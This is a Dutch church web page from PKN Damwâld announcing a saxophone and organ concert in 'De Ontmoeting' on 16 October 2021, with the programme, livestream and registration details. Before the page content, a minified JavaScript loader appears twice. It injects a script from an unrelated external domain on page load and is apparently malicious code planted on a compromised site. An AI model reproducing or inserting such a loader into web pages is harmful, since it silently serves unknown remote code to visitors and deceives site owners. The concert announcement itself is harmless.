;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Concert saxofoon en orgel in “De Ontmoeting”. - PKN Damwâld

Concert saxofoon en orgel in “De Ontmoeting”.

Gepubliceerd op: woensdag 15 september 2021

Al enkele jaren organiseert de muziekcommissie van PKN ‘’De Ontmoeting’’ in Damwâld Foarwei 48, in het najaar een orgelconcert. Was dat vorig jaar alleen via livestream mogelijk, dit jaar mag er weer publiek aanwezig zijn. Dat het concert verrassend moest worden, stond voor de muziekcommissie buiten kijf.

De combinatie saxofoon met orgel komt niet zo vaak voor, maar deze blaasinstrumenten blijken verrassend goed samen te klinken. Daarom is besloten saxofoniste Marlon Valk en organist Harm Hoeve op 16 oktober uit te nodigen voor het jaarlijkse concert in deze kerk. Niet alleen als organist maar ook als koordirigent heeft Harm Hoeve grote bekendheid opgebouwd. Zijn orgelspel kenmerkt zich door contrasten en dynamiek waarbij hij graag direct wil communiceren met zijn luisteraars en ze wil enthousiasmeren voor de prachtige klanken van het orgel en haar muziek. Marlon Valk is een jonge, bevlogen musicus met een grote liefde voor haar instrument, de saxofoon. Naast het optreden in orkesten, is Marlon tijdens de coronapandemie gestart met Dichtbij Huiskamerconcerten, om haar muziek in intieme setting te delen.

De musici hebben een afwisselend programma samengesteld. De avond wordt geopend met een feestelijke Prelude in classic style van Gordon Young. Naast een origineel werk van Bédard worden er ook bekende stukken gespeeld zoals Händels Arrival of the Queen of Sheba en Mozart’s vrolijke Rondo alla turca. Organist Harm Hoeve zal ter afwisseling een aantal orgelsolo’s spelen waarbij hij de vele klankkleuren van dit orgel zal laten horen.

Het concert wordt gehouden op zaterdag 16 oktober en begint om 19.30 uur. Thuis kunnen belangstellenden vanachter de computer, tablet of laptop meegenieten van dit veelzijdige programma. Het concert is te volgen via www.pkndamwald.nl/live en via Kabel Noord kanaal (1)956. Wilt u bij het concert aanwezig zijn, dan dient u zich aan te melden via www.pkndamwald.nl/concert De entree is gratis, na afloop wordt er een collecte gehouden ter bestrijding van de onkosten.